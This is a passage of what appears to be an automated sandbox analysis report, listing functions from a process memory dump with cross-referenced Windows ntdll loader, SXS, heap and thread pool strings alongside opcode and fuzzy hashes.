                                          • Opcode ID: 4377becd9d34a479d33220f12555879c2b0dfa9f578b8ae62a6f3fcfbc5f3abb
                                          • Instruction ID: 628d1f5e98ba48e39af45732ee0f8befeae628cfc1ae1b78708b394e2cd50334
                                          • Opcode Fuzzy Hash: 4377becd9d34a479d33220f12555879c2b0dfa9f578b8ae62a6f3fcfbc5f3abb
                                          • Instruction Fuzzy Hash: 8B91ED72645796AFDB1ECF688890B0A7BBCEF79710F05056CFA44AB254C7349804CBA6
                                          Function 21B0245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                          Download Yara Rule
                                          Strings
                                          • LdrpDynamicShimModule, xrefs: 21B4A998
                                          • apphelp.dll, xrefs: 21B02462
                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 21B4A992
                                          • minkernel\ntdll\ldrinit.c, xrefs: 21B4A9A2
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-176724104
                                          • Opcode ID: 7f0f9b76d44df74d95adc54a104249e6c781fd2d29165a9ed08cb007ddd2736f
                                          • Instruction ID: f46d9f40bbf1d69c0c5f03238abe60fd148bd587658d99efe076115b620d3276
                                          • Opcode Fuzzy Hash: 7f0f9b76d44df74d95adc54a104249e6c781fd2d29165a9ed08cb007ddd2736f
                                          • Instruction Fuzzy Hash: 5B314B76E40202EBD71DDF79C9A1E6EBBB8FF86B00F16405AF90167261C7745941EB80
                                          Function 21AEEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                          • API String ID: 0-1109411897
                                          • Opcode ID: 96b88e935b24fc3a201ddb8cc41a55e33c8208d6e1c7b7fb8ee0f265aab2d6e8
                                          • Instruction ID: 23c99008b011b6dd259743137e490e16df2a91ece85232bab81abf3d3a4536ff
                                          • Opcode Fuzzy Hash: 96b88e935b24fc3a201ddb8cc41a55e33c8208d6e1c7b7fb8ee0f265aab2d6e8
                                          • Instruction Fuzzy Hash: F2A23974E0562A8FDB68CF18C998B99BBB5FF45304F2482E9D50CA7290DB319E95CF00
                                          Function 21B163FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-792281065
                                          • Opcode ID: 36d30e439c241116dd90aeba5f62e1bc23cc61b0783e54bdf66f4e557f9ab428
                                          • Instruction ID: e06db7fa9d87fedd8a11a14f2f83197807ea8969ff3cbd13963ebba370526d63
                                          • Opcode Fuzzy Hash: 36d30e439c241116dd90aeba5f62e1bc23cc61b0783e54bdf66f4e557f9ab428
                                          • Instruction Fuzzy Hash: 3E918771A40266AFEB1DCF21C890F9A7BB5FF56B64F11012DE904BB295E7B88801C7D1
                                          Function 21B1C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                          Download Yara Rule
                                          Strings
                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 21B581E5
                                          • LdrpInitializeProcess, xrefs: 21B1C6C4
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 21B58181, 21B581F5
                                          • LdrpInitializeImportRedirection, xrefs: 21B58177, 21B581EB
                                          • minkernel\ntdll\ldrinit.c, xrefs: 21B1C6C3
                                          • Loading import redirection DLL: '%wZ', xrefs: 21B58170
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-475462383
                                          • Opcode ID: 65470ae613233acd399057cd98980822839d3674eb812316a948c0eadaecd14b
                                          • Instruction ID: 255fb7b91f96091088f014f41840f209f69a01525b4677bc5f2d6b4fc9458fb2
                                          • Opcode Fuzzy Hash: 65470ae613233acd399057cd98980822839d3674eb812316a948c0eadaecd14b
                                          • Instruction Fuzzy Hash: 7131077164474AAFC61CDF29CD85E2B7BF4EF98B10F05055CF884AB2A5E620ED04C7A2
                                          Function 21B12674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                          Download Yara Rule
                                          Strings
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 21B5219F
                                          • SXS: %s() passed the empty activation context, xrefs: 21B52165
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 21B52180
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 21B521BF
                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 21B52178
                                          • RtlGetAssemblyStorageRoot, xrefs: 21B52160, 21B5219A, 21B521BA
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          • Opcode ID: 653471ca4d486567d7294589572e7c52ea435c6d9eea9941a764eed60a75042d
                                          • Instruction ID: cfb48c275238f95939f1dbee8adbb0b5f2ad92741b87c0712948753413f934a6
                                          • Opcode Fuzzy Hash: 653471ca4d486567d7294589572e7c52ea435c6d9eea9941a764eed60a75042d
                                          • Instruction Fuzzy Hash: 1D31D43AE01115BBEB19CF97CC80F5B7B78EB65B50F120199BB04AB258D2309E01CBA1
                                          Function 21AF0770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: fcf3c97526b4aced829dbab9fe1236df06b10c721ce35f64eb3a130f62d20750
                                          • Instruction ID: 9e4bc14805c1ebe9b75736ee33c3bd89850d5e53f78d569077354b56b69b7232
                                          • Opcode Fuzzy Hash: fcf3c97526b4aced829dbab9fe1236df06b10c721ce35f64eb3a130f62d20750
                                          • Instruction Fuzzy Hash: 08F1BB70A00A06DFEB19CF68C991F6ABBF6FF55300F1481A9E4059B391D735EA81CB90
                                          Function 21B00BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Failed to allocated memory for shimmed module list, xrefs: 21B4A10F
                                          • minkernel\ntdll\ldrinit.c, xrefs: 21B4A121
                                          • LdrpCheckModule, xrefs: 21B4A117
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-161242083
                                          • Opcode ID: 2f5adf0c7f3aea0bc91be1a5e2e0e20091f6ab31cd30a1d2eac08ce01ca6b4af
                                          • Instruction ID: ed2146f5ddc066438250376a84330c7745c545a214df7f5614609f0076b874af
                                          • Opcode Fuzzy Hash: 2f5adf0c7f3aea0bc91be1a5e2e0e20091f6ab31cd30a1d2eac08ce01ca6b4af
                                          • Instruction Fuzzy Hash: 1F71C071A002069FDB1DDF68C990AAEBBF4FF49744F14802DD806E7261E735AA81DB50
                                          Function 21B1C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Failed to reallocate the system dirs string !, xrefs: 21B582D7
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 21B582DE
                                          • minkernel\ntdll\ldrinit.c, xrefs: 21B582E8
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-1783798831
                                          • Opcode ID: 11dbfe4f7c77477446a2231125d31091468c83c9bb2358337e26c20d5055c052
                                          • Instruction ID: 2b0c58ffa2e86c98a2641d4a06b98a36bd7f57fb2749a7d3bd0b5d2a30df74bf
                                          • Opcode Fuzzy Hash: 11dbfe4f7c77477446a2231125d31091468c83c9bb2358337e26c20d5055c052
                                          • Instruction Fuzzy Hash: E4410FB2644305AFCB19DF75C980B8B7BF8EF59750F01492AF948D32A4EB78D9008B91
                                          Function 21B64755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • LdrpCheckRedirection, xrefs: 21B6488F
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 21B64899
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 21B64888
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 3446177414-3154609507
                                          • Opcode ID: bb1728d1305b82388d6210d5b483635a952046a12e1720746ddc46eff9672fe7
                                          • Instruction ID: 3aab3a1b6c2a792f5a556986b1fee543d2d4b682567b2ea11132af5fd99fe7a8
                                          • Opcode Fuzzy Hash: bb1728d1305b82388d6210d5b483635a952046a12e1720746ddc46eff9672fe7
                                          • Instruction Fuzzy Hash: 4141BE32A05AD19FCB19CE68C940E267BFCFFAA750F02065DED4897269E734D900CB91
                                          Function 21B2096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 21B22DF0: LdrInitializeThunk.NTDLL ref: 21B22DFA
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 21B20BA3
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 21B20BB6
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 21B20D60
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 21B20D74
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                          • String ID:
                                          • API String ID: 1404860816-0
                                          • Opcode ID: c6f4c0d396b025ea81d9c1be715d654016faaf9740f406a7e7e993bf8fc626bd
                                          • Instruction ID: 334072c462caa73de4ef1a3900b04e2c0a32dd8e4b1170f1d94768a9afab15f6
                                          • Opcode Fuzzy Hash: c6f4c0d396b025ea81d9c1be715d654016faaf9740f406a7e7e993bf8fc626bd
                                          • Instruction Fuzzy Hash: 76425871900715DFDB65CF24C880BAAB7F5FF08310F0445A9E989EB245E770AA89CF61
                                          Function 21BBB16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 5704dc26ad6ac71a8e376fec52a1983fcff4335ffdda48946f71c4b8a0b43b7a
                                          • Instruction ID: 9efc9a683fb0d143f45bdf862dbf654ed8f495cb924ef0eeb247a39978bf72e6
                                          • Opcode Fuzzy Hash: 5704dc26ad6ac71a8e376fec52a1983fcff4335ffdda48946f71c4b8a0b43b7a
                                          • Instruction Fuzzy Hash: F2F1E472E006118FCB2CCF69CAA067EBFF5EF99210719416DD896DB791E634EA01CB50
                                          Function 21AE04E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 21AE063D
                                          • kLsE, xrefs: 21AE0540
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                          • API String ID: 3446177414-2547482624
                                          • Opcode ID: 6c1da775349f8470cbeea04a0e150612293aaa9fa61c2145ca4884d84029a684
                                          • Instruction ID: 3951b6be495efd28604264cd36c29c2837554a27209b1c88aa3747131eb0d8b6
                                          • Opcode Fuzzy Hash: 6c1da775349f8470cbeea04a0e150612293aaa9fa61c2145ca4884d84029a684
                                          • Instruction Fuzzy Hash: C2518871604B429FD315DF74C6896A7BBE4BF85300F10883EEAAE87241E7749645CFA2
                                          Function 21AEA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                          • API String ID: 0-379654539
                                          • Opcode ID: dad07ccf8ac24327d19d567b6a69902b02b0876b7cd63abe4f58d58a375e71f1
                                          • Instruction ID: 6be6f88cf97821cd6b288d4f64478760c03457fabf67bd89420188ff93864aa5
                                          • Opcode Fuzzy Hash: dad07ccf8ac24327d19d567b6a69902b02b0876b7cd63abe4f58d58a375e71f1
                                          • Instruction Fuzzy Hash: 4CC179746083828FD715CF64C148B5AB7F8FF85704F04896EF99A8B252E734CA49CB66
                                          Function 21B18402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                          Download Yara Rule
                                          Strings
                                          • LdrpInitializeProcess, xrefs: 21B18422
                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 21B1855E
                                          • @, xrefs: 21B18591
                                          • minkernel\ntdll\ldrinit.c, xrefs: 21B18421
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1918872054
                                          • Opcode ID: 0c267241b1f447b6688a322280afdba2d55c7c98f30a6d8d0d63b706f003b1f8
                                          • Instruction ID: 4e9b1f91097c2e1c606d28ceb19393a7b892cfdfae4d7589e37fd8bf3b8b50fd
                                          • Opcode Fuzzy Hash: 0c267241b1f447b6688a322280afdba2d55c7c98f30a6d8d0d63b706f003b1f8
                                          • Instruction Fuzzy Hash: F0915B71548345AFDB25CF61C980EABBAFCFF98744F40092EFA84D2155E634DA04CB62
                                          Function 21B1273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                          Download Yara Rule
                                          Strings
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 21B521D9, 21B522B1
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 21B522B6
                                          • SXS: %s() passed the empty activation context, xrefs: 21B521DE
                                          • .Local, xrefs: 21B128D8
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          • Opcode ID: 268087637d1e1ce7afd5294a057e25840d399b7b24f7a64e660d4ebe223de3ac
                                          • Instruction ID: 4477d93f9876791ee8964a4a3b61742f3fd3d0075b35b5e1259e7098d405f564
                                          • Opcode Fuzzy Hash: 268087637d1e1ce7afd5294a057e25840d399b7b24f7a64e660d4ebe223de3ac
                                          • Instruction Fuzzy Hash: B3A1BE35D01229DFDB28CF68C884B99B7B5FF59394F2201E9D908AB265D7309E80CF90
                                          Function 21B14AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                          Download Yara Rule
                                          Strings
                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 21B5342A
                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 21B53437
                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 21B53456
                                          • RtlDeactivateActivationContext, xrefs: 21B53425, 21B53432, 21B53451
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                          • API String ID: 0-1245972979
                                          • Opcode ID: 72e076cd1b458681d5c997c9c5230eb46c031e84ccde559216cdc42c7a41950b
                                          • Instruction ID: 4058550d3852559871412b87b3926363134e818b8fa8b0d3795a670a25d586ef
                                          • Opcode Fuzzy Hash: 72e076cd1b458681d5c997c9c5230eb46c031e84ccde559216cdc42c7a41950b
                                          • Instruction Fuzzy Hash: B2611032600A12AFD71ACF19C891B1BBBF5EF96B50F16862DE9549B364C734E801CB91
                                          Function 21AE64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                          Download Yara Rule
                                          Strings
                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 21B40FE5
                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 21B410AE
                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 21B41028
                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 21B4106B
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                          • API String ID: 0-1468400865
                                          • Opcode ID: a9c89e469e55f2924c04fa91a12543557786e74b6d8e4d3935337f7977c31eda
                                          • Instruction ID: 9911f2fa07fbf437352087bcd4a88a7c9ae1c9bd16df8b6507dd11364ccd69f7
                                          • Opcode Fuzzy Hash: a9c89e469e55f2924c04fa91a12543557786e74b6d8e4d3935337f7977c31eda
                                          • Instruction Fuzzy Hash: 63718C71A047459FCB11DF28C888F8B7BB9EB99760F444868F94C8A257D734D588CBE2
                                          Function 21AF29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                          Download Yara Rule
                                          Strings
                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 21AF327D
                                          • HEAP: , xrefs: 21AF3264
                                          • HEAP[%wZ]: , xrefs: 21AF3255
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
